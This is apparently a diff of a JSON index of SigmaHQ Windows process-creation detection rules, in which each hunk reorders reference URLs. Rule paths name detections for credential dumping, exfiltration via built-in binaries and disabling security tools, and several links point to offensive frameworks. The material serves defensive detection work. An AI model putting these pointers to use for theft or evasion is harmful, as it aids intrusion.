"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml" ], "tags": [ @@ -62873,8 +62897,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", + "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" ], "tags": [ @@ -62943,8 +62967,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml" ], "tags": [ @@ -63143,8 +63167,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/shantanu561993/SharpChisel", "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", + "https://github.com/shantanu561993/SharpChisel", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml" ], "tags": [ @@ -63178,8 +63202,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" ], "tags": [ @@ -63204,10 +63228,10 @@ "logsource.product": "windows", "refs": [ "http://blog.sevagas.com/?Hacking-around-HTA-files", + "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", "https://twitter.com/mattifestation/status/1326228491302563846", "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", - "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_execution.yml" ], "tags": [ @@ -63328,8 +63352,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" ], "tags": [ @@ -63429,9 +63453,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml" ], "tags": [ @@ -63555,9 +63579,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://twitter.com/jonasLyk/status/1555914501802921984", - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml" ], "tags": [ @@ -63590,8 +63614,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Moriarty_Meng/status/984380793383370752", "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", + "https://twitter.com/Moriarty_Meng/status/984380793383370752", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_input_stream.yml" ], "tags": [ @@ -63973,8 +63997,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_modification.yml" ], "tags": [ @@ -63998,8 +64022,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", + "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_secedit.yml" ], "tags": [ @@ -64105,9 +64129,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/_st0pp3r_/status/1583914515996897281", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://twitter.com/_st0pp3r_/status/1583914515996897281", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" ], "tags": [ @@ -64173,8 +64197,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", + "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", "https://www.exploit-db.com/exploits/37525", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" ], @@ -64331,8 +64355,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powersploit_empire_schtasks.yml" ], "tags": [ @@ -64412,10 +64436,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://twitter.com/cglyer/status/1355171195654709249", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://twitter.com/cglyer/status/1355171195654709249", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml" ], "tags": [ @@ -64512,9 +64536,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" @@ -64653,9 +64677,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", "https://lolbas-project.github.io/lolbas/Binaries/Psr/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psr_capture_screenshots.yml" ], "tags": [ @@ -64702,11 +64726,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trust_discovery.yml" ], "tags": [ @@ -64790,8 +64814,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium_sha1.yml" ], "tags": [ @@ -64877,9 +64901,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.poweradmin.com/paexec/", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://www.poweradmin.com/paexec/", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml" ], "tags": [ @@ -64912,8 +64936,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", "https://twitter.com/1ZRR4H/status/1534259727059787783", + "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml" ], "tags": [ @@ -64937,9 +64961,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", + "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_cmd.yml" ], "tags": [ @@ -65073,9 +65097,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer", "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/", + "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer", "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml" ], @@ -65109,9 +65133,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", - "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement", + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml" ], "tags": [ @@ -65177,9 +65201,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/_st0pp3r_/status/1583914244344799235", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://twitter.com/_st0pp3r_/status/1583914244344799235", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" ], "tags": [ @@ -65300,8 +65324,8 @@ "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", - "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", + "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_x509enrollment.yml" ], "tags": "No established tags" @@ -65477,9 +65501,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", "https://attack.mitre.org/software/S0404/", "https://twitter.com/vxunderground/status/1423336151860002816", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_esentutl_params.yml" ], "tags": [ @@ -65521,8 +65545,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/gN3mes1s/status/1222088214581825540", - "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml" ], "tags": [ @@ -65686,8 +65710,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_reconnaissance.yml" ], "tags": [ @@ -65720,8 +65744,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.echotrail.io/insights/search/ilasm.exe", "https://lolbas-project.github.io/lolbas/Binaries/Ilasm/", + "https://www.echotrail.io/insights/search/ilasm.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml" ], "tags": [ @@ -65901,8 +65925,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d", "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/", + "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml" ], "tags": [ @@ -65938,10 +65962,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://vms.drweb.fr/virus/?i=24144899", "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", "https://twitter.com/JohnLaTwC/status/1415295021041979392", - "https://vms.drweb.fr/virus/?i=24144899", - "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml" ], "tags": [ @@ -65965,8 +65989,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml" ], "tags": [ @@ -66166,8 +66190,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html", "https://twitter.com/mattifestation/status/986280382042595328", + "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bypass_squiblytwo.yml" ], "tags": [ @@ -66393,8 +66417,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", "https://twitter.com/pabraeken/status/993298228840992768", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" ], @@ -66482,8 +66506,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_with_wmiprvse_parent_process.yml" ], "tags": [ @@ -66583,8 +66607,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall", "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml" ], "tags": [ @@ -66617,8 +66641,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/CyberRaiju/status/1273597319322058752", "https://twitter.com/bohops/status/1276357235954909188?s=12", + "https://twitter.com/CyberRaiju/status/1273597319322058752", "https://twitter.com/nas_bench/status/1535322450858233858", "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml" @@ -66644,10 +66668,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", - "https://twitter.com/lefterispan/status/1286259016436514816", - "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", "https://twitter.com/jseerden/status/1247985304667066373/photo/1", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", + "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", + "https://twitter.com/lefterispan/status/1286259016436514816", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml" ], "tags": [ @@ -66772,8 +66796,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml" ], "tags": [ @@ -66806,8 +66830,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/windowsterminalprofile.html", "https://twitter.com/nas_bench/status/1550836225652686848", + "https://persistence-info.github.io/Data/windowsterminalprofile.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml" ], "tags": [ @@ -66864,13 +66888,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", "https://pentestlab.blog/tag/ntds-dit/", - "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", "https://github.com/zcgonvh/NTDSDumpEx", + "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", - "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml" ], "tags": [ @@ -66903,8 +66927,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_sqlcmd.yml" ], @@ -66939,12 +66963,12 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", - "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", - "https://www.cobaltstrike.com/help-opsec", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", "https://twitter.com/CyberRaiju/status/1251492025678983169", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", + "https://www.cobaltstrike.com/help-opsec", + "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml" ], "tags": [ @@ -67010,10 +67034,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", - "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", - "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml" ], "tags": "No established tags" @@ -67091,8 +67115,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" ], "tags": [ @@ -67160,9 +67184,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml" ], "tags": [ @@ -67253,8 +67277,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Replace/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace", + "https://lolbas-project.github.io/lolbas/Binaries/Replace/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" ], "tags": [ @@ -67321,8 +67345,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/", "https://twitter.com/pabraeken/status/991335019833708544", + "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml" ], "tags": [ @@ -67459,9 +67483,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.joeware.net/freetools/tools/adfind/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://www.joeware.net/freetools/tools/adfind/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_enumeration.yml" ], "tags": [ @@ -67485,8 +67509,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", 